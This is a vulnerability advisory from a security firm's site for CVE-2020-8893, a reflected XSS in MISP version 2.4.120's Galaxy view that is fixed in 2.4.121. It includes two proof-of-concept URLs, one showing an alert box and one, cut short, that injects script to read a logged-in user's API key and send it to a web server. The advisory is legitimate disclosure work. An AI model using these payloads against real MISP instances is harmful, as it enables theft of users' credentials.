We are reliable, trustworthy, and ready for challenges! Hire Us
MISP – Reflected XSS in Galaxy view
- Home
- Advisories
- MISP – Reflected XSS in Galaxy view
DATE
25.02.2020
Affected Vendor
CIRCL – Computer Incident Response Center Luxembourg
Affected Product
MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/
Vulnerable version
2.4.120
Fixed version
2.4.121
CVSS
6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Recommendations
Update to MISP version 2.4.121
Vulnerability details
PoC
Proof of concept alert box:
https://MISP_URL/galaxies/view/188/searchall:a%22)%3balert(1);;$.get(%22http%3a/0.0.0.0/www
Proof of concept of API key extraction to localhost web server:
https://MISP_URL/galaxies/view/188/searchall:a")%3b$.get('%5c%5cusers%5c%5cview%5c%5cme',function(d){pos_start+%3d+d.indexOf('<h2>User
CVE
CVE-2020-8893
Credits
Dawid Czarnecki
Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.